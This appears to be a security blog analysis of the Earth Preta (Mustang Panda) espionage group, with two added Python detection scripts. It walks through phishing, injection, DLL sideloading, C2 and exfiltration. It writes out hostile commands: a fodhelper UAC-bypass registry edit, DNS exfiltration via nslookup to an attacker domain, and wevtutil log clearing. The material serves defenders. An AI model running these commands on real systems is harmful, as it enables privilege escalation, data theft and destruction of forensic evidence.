A sophisticated cyberespionage group known as Earth Preta (also called Mustang Panda) has been identified using advanced techniques to infiltrate systems and evade detection. Their stealthy approach involves leveraging legitimate Windows utilities to execute malicious payloads, making it difficult for Endpoint Detection and Response (EDR) systems such as CrowdStrike, Carbon Black, and Sophos, as well as Microsoft Defender, to detect their presence.
This research provides an in-depth technical analysis of how Earth Preta infiltrates machines, escalates privileges, maintains persistence, and steals sensitive data while avoiding cybersecurity defenses.
Earth Preta, also known as Mustang Panda, is a sophisticated advanced persistent threat (APT) group recognized for its cyberespionage activities, primarily targeting government entities and organizations across the Asia-Pacific (APAC) region. Their operations have evolved over time, employing advanced techniques to infiltrate systems, evade detection, and maintain prolonged access to compromised networks.
Evolution of Tactics
Earth Preta’s tactics have continually evolved to enhance their infiltration capabilities and persistence within target networks. In campaigns dating back to 2022, the group extensively utilized spear-phishing emails to deliver malware. These emails often contained links to malicious files hosted on platforms like Google Drive. The malicious payloads were typically archived in formats such as RAR, ZIP, or JAR files. Upon execution, these payloads would deploy malware families like TONEINS, TONESHELL, and PUBLOAD, which facilitated further compromise of the target systems.
In subsequent operations, Earth Preta expanded their toolkit to include new malware variants and propagation methods. Notably, they began using a worm-like malware known as HIUPAN to propagate their payloads via removable drives. This approach allowed the malware to spread more widely and persistently across networks, even in environments with stringent email security measures. The HIUPAN worm was configured to install itself on a system and create autorun registry entries to maintain persistence. It also modified system registry settings to conceal its presence, making detection and removal more challenging.
Target Profile and Objectives
Earth Preta’s targeting has been diverse, focusing on various sectors and regions. While their operations have a global reach, there is a pronounced emphasis on entities within the APAC region. Their targets have included government agencies, academic institutions, research organizations, and foundations. The group’s objectives appear to center on the acquisition of sensitive information, intellectual property, and strategic data that could serve geopolitical interests. For example, in campaigns observed in 2022, Earth Preta targeted government entities and organizations involved in international relations, aiming to gather intelligence on geopolitical developments.
In more recent campaigns, Earth Preta has demonstrated adaptability by shifting their focus to sectors such as maritime operations, shipping, border control, and immigration agencies. This shift suggests a strategic realignment to areas of emerging interest, possibly in response to global events or changing intelligence priorities. The group’s ability to modify their targeting and techniques underscores their commitment to maintaining relevance and effectiveness in their cyberespionage efforts.
Step 1: Initial Compromise – Spear Phishing with Malicious Attachments
One of Earth Preta’s primary attack vectors is spear phishing. The attackers send emails with an infected attachment, usually in the form of a RAR, ZIP, or JAR archive. These archives contain an executable file masquerading as a PDF (e.g., Report.pdf.exe), tricking users into opening it.
Why EDR or Defender Might Not Detect This
- Polymorphic malware: The executable payload constantly changes to evade signature-based detection.
- File extension trickery: Many security tools rely on file extensions to determine if a file is malicious, and double extensions often bypass these controls.
- No exploit needed: The attack relies on social engineering rather than software vulnerabilities, making it harder to flag.
Step 2: Establishing Persistence – Hiding in Trusted System Processes
Once executed, the malware ensures it survives system reboots and security scans by hiding in legitimate Windows processes.
Example: Using MAVInject.exe for Code Injection
- MAVInject.exe is a legitimate Windows utility that allows injecting code into running processes.
- Earth Preta injects their malware into waitfor.exe, a native Windows process, allowing the malware to run discreetly.
Why EDR or Defender Might Not Detect This
- Process injection bypasses direct execution monitoring.
- MAVInject.exe is a Microsoft-signed tool, making it inherently trusted.
- No suspicious activity in logs, since waitfor.exe appears to function normally.
Step 3: Escalating Privileges – Bypassing User Account Control (UAC)
To gain administrator privileges, Earth Preta exploits Windows auto-elevation features to bypass UAC.
Example: Exploiting Fodhelper.exe
- The malware modifies the registry to make fodhelper.exe execute their payload with elevated privileges.
- The attacker runs:
REG ADD HKCU\Software\Classes\ms-settings\shell\open\command /ve /t REG_SZ /d "C:\malicious_payload.exe" /f
fodhelper.exe
- Windows executes the payload with admin rights.
Why EDR or Defender Might Not Detect This
- Fodhelper.exe is a trusted Windows binary.
- No direct exploit, just registry changes.
- Process execution appears normal.
Step 4: Installing a Backdoor – Deploying TONESHELL
After obtaining elevated privileges, the attacker installs TONESHELL, a backdoor that provides long-term access to the compromised system.
Example: DLL Sideloading via a Legitimate Application
- Earth Preta places a malicious DLL (TONESHELL.dll) inside the folder of a trusted software, such as an Electronic Arts game updater.
- When the legitimate Updater.exe runs, it automatically loads the malicious DLL, activating the backdoor.
Why EDR or Defender Might Not Detect This
- EDR primarily scans executables, not DLLs.
- The legitimate software initiates the attack, avoiding red flags.
- TONESHELL communicates with command-and-control (C&C) servers using encrypted traffic.
Step 5: Gaining Remote Control – Executing Commands via C&C Server
Once inside, the attacker controls the infected machine remotely.
Example: Sending Commands from a C&C Server
- The compromised system connects to: hxxp://malicious-server.com/control
- The attacker retrieves system details: tasklist /v
- They execute file transfers: copy C:\Users\victim\Documents\secrets.docx C:\Temp\
- To execute additional malware: start C:\Temp\stealer.exe
Why EDR or Defender Might Not Detect This
- Encrypted communications with C&C servers evade firewalls.
- Commands appear as normal system activities.
- Attackers use compromised domains to avoid blacklisting.
Step 6: Stealing Data – Using DNS Tunneling for Exfiltration
Instead of using HTTP or FTP, which may be blocked, the malware hides stolen data inside DNS requests.
Example: Data Exfiltration via DNS Requests
nslookup stolen_data.secret.com
- This sends stolen files encoded within a DNS query to an external attacker-controlled domain.
Why EDR or Defender Might Not Detect This
- Firewalls rarely block DNS requests.
- Looks like a normal domain lookup.
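A detection check for the DNS tunnelling described in this step, added here as an example and not part of the original article. It parses constructed query-log lines in a simplified "client <ip> query: <name> <type>" shape and scores each client/parent-domain pair on subdomain length, Shannon entropy and the number of unique subdomains seen, which generalises beyond the single nslookup shown above to the repeated, chunked queries a real transfer needs; the thresholds, the log shape and the secret.com sample are assumptions for the example.

```python
import hashlib
import math
import re
from collections import defaultdict

# Constructed log shape (assumption): "client <ip> query: <qname> <type>"
QUERY_RE = re.compile(r"client (\S+) query: (\S+) (\S+)")

def entropy(s):
    """Shannon entropy in bits per character of s; 0.0 for an empty string."""
    if not s:
        return 0.0
    return -sum(s.count(c) / len(s) * math.log2(s.count(c) / len(s)) for c in set(s))

def split_name(qname):
    """(subdomain, parent) where parent is the last two labels (no public-suffix list)."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[:-2]), ".".join(labels[-2:])

def analyse(lines, max_sub_len=40, max_entropy=3.5, max_unique=20):
    """Return [(client, parent_domain, sorted indicator names)] for suspicious pairs."""
    subs = defaultdict(set)     # (client, parent) -> unique subdomains seen
    reasons = defaultdict(set)  # (client, parent) -> indicators that fired
    for line in lines:
        m = QUERY_RE.search(line)
        if not m:
            continue
        client, qname, _qtype = m.groups()
        sub, parent = split_name(qname)
        key = (client, parent)
        subs[key].add(sub)
        if len(sub) > max_sub_len:            # one label carrying a data chunk
            reasons[key].add("long_subdomain")
        if entropy(sub.replace(".", "")) > max_entropy:  # encoded, not a word
            reasons[key].add("high_entropy")
    for key, seen in subs.items():
        if len(seen) > max_unique:            # many never-repeated names = chunks
            reasons[key].add("many_unique_subdomains")
    return [(c, p, sorted(r)) for (c, p), r in reasons.items()]

def chunk(i):
    """Constructed stand-in for one encoded data chunk (48 hex characters)."""
    return hashlib.sha256(f"chunk{i}".encode()).hexdigest()[:48]

# Constructed sample: 25 chunk queries under secret.com from one host, plus normal lookups.
EXFIL = [f"client 10.0.0.5 query: {chunk(i)}.secret.com TXT" for i in range(25)]
BENIGN = [f"client 10.0.0.7 query: {h}.example.com A" for h in ("www", "mail", "www")]

if __name__ == "__main__":
    for finding in analyse(EXFIL + BENIGN):
        print(finding)
```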
Step 7: Covering Tracks – Deleting Logs and Artifacts
Before leaving, Earth Preta erases all traces of their attack.
Example: Clearing Windows Event Logs
wevtutil cl System
- Deletes security logs, preventing forensic analysis.
Why EDR or Defender Might Not Detect This
- Log clearing is a common administrative action.
- Executed from a legitimate Windows process.
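Steps 2, 3 and 7 all leave a process-creation record, so one rule set can cover them. This Python example is added here and is not the article's code: it runs over constructed lines whose field names follow Sysmon Event ID 1 (Image, CommandLine, ParentImage) but whose paths and PIDs are made up; the /INJECTRUNNING switch is mavinject.exe's documented injection argument and is known from the tool itself, not cited by the article.

```python
import re

FIELD_RE = re.compile(r'(\w+)="([^"]*)"')

def parse_line(line):
    """Parse a 'Key="value" ...' line into a dict holding the three fields we use."""
    rec = {"Image": "", "CommandLine": "", "ParentImage": ""}
    rec.update(FIELD_RE.findall(line))
    return rec

# /INJECTRUNNING is mavinject.exe's own switch for injecting a DLL into a running
# process (tool knowledge, not taken from the article). Outside App-V it is rare.
RULES = [
    ("mavinject_injection", lambda r:
        r["Image"].lower().endswith("\\mavinject.exe")
        and "/injectrunning" in r["CommandLine"].lower()),
    ("fodhelper_uac_bypass_setup", lambda r:          # the REG ADD from Step 3
        "ms-settings\\shell\\open\\command" in r["CommandLine"].lower()),
    ("fodhelper_spawned_child", lambda r:             # payload launched elevated
        r["ParentImage"].lower().endswith("\\fodhelper.exe")),
    ("event_log_cleared", lambda r:                   # wevtutil cl from Step 7
        r["Image"].lower().endswith("\\wevtutil.exe")
        and bool(re.search(r"\s(cl|clear-log)\s", r["CommandLine"], re.I))),
]

def detect(lines):
    """Return [(rule_name, Image)] for every line matching a rule, in log order."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        for name, pred in RULES:
            if pred(rec):
                hits.append((name, rec["Image"]))
    return hits

# Constructed sample: the article's chain followed by one benign launch.
SAMPLE_LOG = [
    'Image="C:\\Windows\\System32\\mavinject.exe" CommandLine="mavinject.exe 4120 /INJECTRUNNING C:\\Temp\\t.dll" ParentImage="C:\\Users\\victim\\Report.pdf.exe"',
    'Image="C:\\Windows\\System32\\reg.exe" CommandLine="REG ADD HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command /ve /t REG_SZ /d C:\\malicious_payload.exe /f" ParentImage="C:\\Users\\victim\\Report.pdf.exe"',
    'Image="C:\\malicious_payload.exe" CommandLine="C:\\malicious_payload.exe" ParentImage="C:\\Windows\\System32\\fodhelper.exe"',
    'Image="C:\\Windows\\System32\\wevtutil.exe" CommandLine="wevtutil cl System" ParentImage="C:\\Windows\\System32\\cmd.exe"',
    'Image="C:\\Windows\\System32\\notepad.exe" CommandLine="notepad.exe" ParentImage="C:\\Windows\\explorer.exe"',
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_LOG):
        print(*hit)
```

On a real endpoint the same rules apply to Sysmon Event ID 1 or Windows Security Event 4688 with command-line auditing enabled; the log-clear itself also raises Security Event 1102 / System Event 104, which can corroborate the last rule.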
Conclusion: How Earth Preta Remains Undetected
Step | Evasion Technique | Why EDR/Defender Misses It
---|---|---
1. Phishing | Fake PDFs with double extensions | No exploit, just execution
2. Persistence | Injection into waitfor.exe | Hides in a trusted process
3. Privilege escalation | UAC bypass (fodhelper.exe) | Registry changes, not exploits
4. Backdoor | DLL sideloading | No suspicious executables
5. Remote control | Use of trusted processes | tasklist, copy look legitimate
6. Exfiltration | DNS tunneling | DNS traffic is not monitored
7. Covering tracks | Log clearing | Common administrative action
How to Defend Against Earth Preta
✅ Monitor process injections
✅ Detect unusual DLL loads
✅ Inspect DNS traffic for anomalies
✅ Restrict PowerShell and MAVInject.exe
✅ Train employees on phishing attacks
Earth Preta is a stealthy APT group, but organizations can defend against their techniques by implementing advanced behavioral monitoring and network security controls.
Information security specialist, currently working as risk infrastructure specialist & investigator.
15 years of experience in risk and control process, security audit support, business continuity design and support, workgroup management and information security standards.